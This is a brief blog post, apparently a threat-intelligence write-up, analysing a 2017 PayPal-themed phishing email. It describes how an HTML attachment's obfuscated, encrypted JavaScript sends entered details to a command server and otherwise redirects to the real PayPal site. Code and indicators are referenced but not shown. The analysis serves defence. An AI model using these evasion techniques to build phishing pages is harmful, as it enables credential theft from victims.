Phishing: PayPal theme 10 May 2017 | CredSteal

Originally published in PhishCentral

This one is active currently - trying to lure victims into downloading and opening a HTML file, that fires up locally in the browser but POSTs information online, back to the c2 when the 'submit' button is hit, if the information matches the conditions in the script.
This what the email body looks like. 

The HTML Attachment

Clever JS in the background makes the connection. It is obfuscated. 
The actual HTML content only loads if internet is available. The JS fetches the page contents and then displays them in the browser. 

Locally saved html, loaded into a browser with internet avaialble

The actual content is served from this server:

PCAP of the request in the background

The content served

The whole HTML is encrypted and is only decrypted on the go in the browser. When decrypted, we can see the JS code that executes in the browser. 

Decrypted Code

The JS code is clever and checks for a few conditions. If the conditions are met, it POSTs the info to the c2 - and if the conditions are not met, it re-directs to legit PayPal site. 

One of the conditions. 

Final condition that directs the traffic

IOCs for this:


No comments:

Powered by Blogger.